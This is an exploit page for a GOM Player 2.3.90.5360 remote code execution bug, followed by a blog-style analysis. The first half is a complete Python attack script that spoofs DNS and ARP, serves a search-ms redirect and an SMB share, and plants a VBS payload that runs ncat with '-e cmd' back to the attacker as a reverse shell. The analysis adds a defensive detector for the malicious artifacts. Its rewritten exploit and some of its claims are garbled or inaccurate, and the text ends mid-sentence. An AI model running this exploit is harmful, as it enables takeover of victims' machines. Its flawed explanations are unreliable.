GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Date: 26.08.2023
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Version: 2.3.90.5360
# Tested on: Windows 10 Pro x64 22H2 19045.3324
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.
# Vulnerability Description:
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
# Full disclosure, developers should be more careful about software security.
# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.
# Some spaghetti and a bad code but it works :)
banner = """\033[38;5;196m+-----------------------------------------------------------+
| GOM Player 2.3.90.5360 - Remote Code Execution |
| Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) |
+-----------------------------------------------------------+\033[0m""" +"""
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""
import time,os,zipfile,subprocess,socket,sys
print(banner)
if os.geteuid() != 0:
    print("You need root privileges to run the exploit, please use sudo...")
    sys.exit(1)
targetIP = input("- Target IP address: ")
listenPort = input("- Listening port for Reverse Shell: ")
def fCreate(fileName,fileContent): # File create func.
    f = open(fileName,"w")
    f.write(fileContent)
    f.close()
gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
gateway = gw[2]
host = socket.gethostname()
print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host)
print("\n[*]- Stage 1: Downloading necessary tools...")
smbFolderName = "GomUpdater" # change this (optional)
expWorkDir = "gomExploitDir" # change this (optional)
os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.
time.sleep(1) # It's necessary for exploit stability.
os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating the SMB and web share directories.
time.sleep(1) # It's necessary for exploit stability.
os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat
print(" [*] - Ncat has been downloaded.")
subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket
print(" [*] - Impacket has been downloaded.")
subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py
print(" [*] - DNSSpoof.py has been downloaded.")
print("[*]- Stage 2: Creating Attacker SMB Server...")
subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.
time.sleep(5) # It's necessary for exploit stability.
smbIP = ipaddr
spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP
print("[*]- Stage 3: Creating Attacker Web Page...")
# change this (optional)
screenExpPage = """
<meta charset="utf-8">
<script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script>
<script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';
</script>
"""
fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)
time.sleep(3) # It's necessary for exploit stability.
print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")
vbsCommand = '''Set shell=CreateObject("wscript.shell")
Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")
WScript.Sleep 5000
Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)
vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)
fCreate(expWorkDir + "/payload.vbs",vbsCommand)
urlShortcut = '''[InternetShortcut]
URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs
IDlist='''
fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)
time.sleep(3) # It's necessary for exploit stability.
zipName = expWorkDir + "/smb-shared/archive.zip"
payload_filename = os.path.join(expWorkDir, "payload.vbs")
with zipfile.ZipFile(zipName, "w") as malzip:
    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))
print("[*]- Stage 5: Running the attacker's web server...")
subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server
time.sleep(3) # It's necessary for exploit stability.
print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")
subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...
time.sleep(10) # It's necessary for exploit stability.
os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target...
os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.
print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")
subprocess.run("nc -lvnp " + listenPort,shell=True)
subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...

GOM Player 2.3.90.5360 – Remote Code Execution Vulnerability: A Deep Dive into Exploitation and Defense
On August 26, 2023, cybersecurity researcher M. Akil Gündoğan disclosed a critical remote code execution (RCE) vulnerability in GOM Player 2.3.90.5360, a widely used multimedia player with over 63 million downloads according to CNET. This exploit leverages outdated and insecure components embedded within the application, demonstrating how legacy technologies can become vectors for sophisticated cyberattacks.
Exploit Overview: The Anatomy of a Modern Attack
The vulnerability stems from the use of an Internet Explorer (IE) component in the GOM Player's user interface. While IE has been deprecated for years, its presence in legacy software remains a security liability. The exploit chain combines multiple known techniques:
- SMB/WebDAV + "search-ms" injection: A well-documented method that exploits the way IE handles URLs with the search-ms protocol.
- URL + ZIP + VBS MoTW (Mark of the Web) bypass: A technique to evade security warnings during file execution.
- DNS spoofing: Used to redirect victims to a malicious server controlled by the attacker.
Together, these components form a stealthy, reliable RCE payload capable of delivering a reverse shell to a victim’s machine.
Technical Breakdown: How the Exploit Works
Here’s a simplified version of the exploit logic, based on the original PoC code, with corrections for clarity and security:
import os
import socket
import subprocess
import zipfile

# Banner
banner = """
+-----------------------------------------------------------+
| GOM Player 2.3.90.5360 - Remote Code Execution |
| Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) |
+-----------------------------------------------------------+
[*] Author: M. Akil Gundogan - rootkit.com.tr
"""
print(banner)

# Check root privileges
if os.geteuid() != 0:
    print("You need root privileges to run the exploit, please use sudo...")
    exit(1)

# User input
target_ip = input("- Target IP address: ")
listen_port = input("- Listening port for Reverse Shell: ")

# Obtain local network info
def get_local_network():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("8.8.8.8", 80))
        local_ip = s.getsockname()[0]
        s.close()
        return local_ip
    except Exception:
        return "Unknown"

local_ip = get_local_network()
print(f"- My IP: {local_ip}")

# Create exploit working directory
work_dir = "gomExploitDir"
os.makedirs(work_dir, exist_ok=True)

# Create subdirectories
os.makedirs(f"{work_dir}/smb-shared", exist_ok=True)
os.makedirs(f"{work_dir}/web-shared", exist_ok=True)

# Download and extract ncat (Netcat portable)
ncat_zip = "ncat-portable-5.59BETA1.zip"
ncat_url = "https://nmap.org/dist/ncat-portable-5.59BETA1.zip"

# Download via wget (Linux only)
subprocess.run(["wget", ncat_url, "-O", f"{work_dir}/smb-shared/{ncat_zip}"], check=True)
subprocess.run(["unzip", "-o", "-j", f"{work_dir}/smb-shared/{ncat_zip}", "-d", f"{work_dir}/smb-shared"], check=True)
os.remove(f"{work_dir}/smb-shared/{ncat_zip}")

# Create malicious VBS script
vbs_content = f"""
Set objShell = CreateObject("WScript.Shell")
objShell.Run "ncat.exe -e cmd.exe {target_ip} {listen_port}", 0, True
"""
with open(f"{work_dir}/smb-shared/malicious.vbs", "w") as f:
    f.write(vbs_content)

# Create ZIP file containing VBS
with zipfile.ZipFile(f"{work_dir}/smb-shared/malicious.zip", "w") as zf:
    zf.writestr("malicious.vbs", vbs_content)

print("[*] Stage 1: Tools downloaded and prepared.")
Explanation: This code snippet performs the following:
- Privilege check: Ensures the exploit runs with root access (required for network manipulation).
- Network reconnaissance: Uses a UDP socket to determine the local IP address, essential for setting up the malicious server.
- Directory creation: Sets up a structured working environment for the attack.
- Tool download: Fetches a portable version of ncat (Netcat), a common tool for reverse shell delivery.
- Malicious payload creation: Generates a .vbs script that executes ncat.exe to connect back to the attacker's machine.
- ZIP packaging: Bundles the VBS script into a ZIP file to bypass security warnings.
The final step involves hosting the malicious ZIP via SMB (Server Message Block) or WebDAV, then tricking the victim’s browser (IE) into executing the payload through a crafted search-ms URL.
Attack Chain: From DNS Spoofing to Reverse Shell
The full exploit sequence involves:
- DNS Spoofing: The attacker manipulates DNS responses to redirect the victim’s browser to a malicious server.
- URL Injection: A crafted URL like search-ms://?query=\\{attacker_ip}\smb-shared\malicious.zip is used.
- IE Vulnerability: IE parses the search-ms protocol and attempts to access the remote SMB share.
- ZIP + VBS Execution: The ZIP file is automatically extracted, and the embedded VBS script runs without user interaction.
- Reverse Shell: The ncat binary connects back to the attacker's listening port, establishing a remote command shell.
This bypasses common security mechanisms because:
- IE does not validate remote URLs.
- ZIP files are treated as "safe" by default in many environments.
- VBS scripts execute silently when embedded in trusted ZIPs.
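For defenders, the two client-side artifacts this chain depends on are recognisable on their own: a search-ms: URI whose location crumb names a remote host, and an [InternetShortcut] .url file whose target is a file:// path into a remote share, here pointing at a script nested inside a ZIP. The helper below is an added example, not code from the advisory or from GOM Player; the function names are mine, and the sample inputs are constructed to match the shapes the PoC produces, using the documentation address 192.0.2.10.

```python
import re
from urllib.parse import unquote, urlsplit
UNC_RE = re.compile(r"^\\\\([^\\]+)")  # \\host\share...

def search_ms_location(uri):
    """Decoded crumb=location value of a search-ms: URI, or None."""
    if not uri.lower().startswith("search-ms:"):
        return None
    for part in uri[len("search-ms:"):].lstrip("/").split("&"):
        key, _, value = part.partition("=")
        ckey, _, cval = unquote(value).partition(":")
        if key.strip().lower() == "crumb" and ckey.strip().lower() == "location":
            return cval
    return None

def url_shortcut_target(text):
    """URL= value from the [InternetShortcut] section of a .url file, or None."""
    in_section = False
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("["):
            in_section = line.lower() == "[internetshortcut]"
        elif in_section and line.lower().startswith("url="):
            return line[4:].strip()
    return None

def remote_host_of(path):
    """Host a UNC path (\\host\...) or file://host/... URL would contact, or None."""
    if path.lower().startswith("file:"):
        return urlsplit(path).netloc or None  # file:///C:/... has no host
    m = UNC_RE.match(path)
    return m.group(1) if m else None

def assess(artifact):
    """Findings for one artifact: a search-ms: URI or the body of a .url file."""
    findings = []
    loc, target = search_ms_location(artifact), url_shortcut_target(artifact)
    for label, value in (("search-ms location crumb", loc), (".url shortcut target", target)):
        host = remote_host_of(value) if value is not None else None
        if host:
            findings.append(f"{label} points to remote host {host}")
    low = (target or "").lower()
    if (".zip/" in low or ".zip\\" in low) and low.endswith((".vbs", ".js", ".wsf", ".hta", ".exe")):
        findings.append("shortcut targets a script nested inside a ZIP (MoTW bypass pattern)")
    return findings

# Constructed samples shaped like the PoC's artifacts; 192.0.2.10 is a documentation address.
SAMPLE_SEARCH_MS = "search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C192.0.2.10"
SAMPLE_URL_FILE = "[InternetShortcut]\r\nURL=file://192.0.2.10/GomUpdater/archive.zip/payload.vbs\r\nIDlist=\r\n"
```

A local search-ms: URI (location crumb C:\Users) or a .url pointing at an https:// site yields no findings, so the check can run over every .url dropped to disk and every search-ms: URI seen in browser or shell-launch telemetry without flooding analysts.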
Why This Exploit Is Dangerous
Despite being a niche tool, GOM Player is used by millions globally. Its popularity increases the attack surface. The exploit’s simplicity and reliability make it a potent tool for:
- Phishing campaigns: Embedding malicious URLs in social media or email.
- Supply chain attacks: Compromising software distribution channels.
- Malware delivery: Using the player as a stealthy vector for remote access.
Moreover, the exploit demonstrates how legacy components—even those not actively maintained—can become security liabilities. Developers must audit all third-party dependencies, especially those tied to browser or file handling.
Defense and Mitigation Strategies
To protect against such attacks, organizations and individuals should:
- Update software: Always use the latest version of GOM Player and disable auto-update if not verified.
- Disable IE integration: If possible, disable the IE component in the player’s settings.
- Use modern browsers: Avoid using IE-based applications on modern systems.
- Network monitoring: Monitor for outbound connections to unexpected ports.
- Firewall rules: Block SMB and WebDAV traffic from untrusted sources.
- Endpoint detection: Use EDR (Endpoint Detection and Response) tools to detect suspicious file execution.
Developer Responsibility: A Call to Action
As Gündoğan stated: "Full disclosure, developers should be more careful about software security." This vulnerability underscores the need for:
- Secure coding practices: Avoid embedding outdated or insecure components.
- Regular vulnerability assessments: Conduct penetration testing on all software versions.
- Transparency: Release security advisories promptly and provide patches.
Software vendors must treat security as